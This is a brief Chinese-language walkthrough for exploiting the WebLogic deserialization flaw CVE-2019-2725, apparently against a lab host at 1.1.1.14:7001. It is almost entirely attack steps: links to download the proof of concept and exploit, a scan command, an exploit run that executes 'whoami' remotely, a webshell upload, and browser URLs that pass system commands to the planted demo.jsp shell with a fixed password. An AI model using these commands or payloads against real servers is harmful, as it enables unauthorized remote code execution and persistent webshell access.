漏洞验证
POC下载:https://github.com/TopScrew/CVE-2019-2725
路径kali:/POCandEXP
进入脚本目录:cd /POCandEXP/weblogic/POC
命令:python3 WeblogicScan.py 1.1.1.14 7001
CVE-2019-2725
EXP下载:https://github.com/TopScrew/CVE-2019-2725
安装所需环境:sudo pip3 install logzero
命令回显
命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 whoami
webshell上传
命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001
浏览器输入payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ifconfig
windows服务器payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig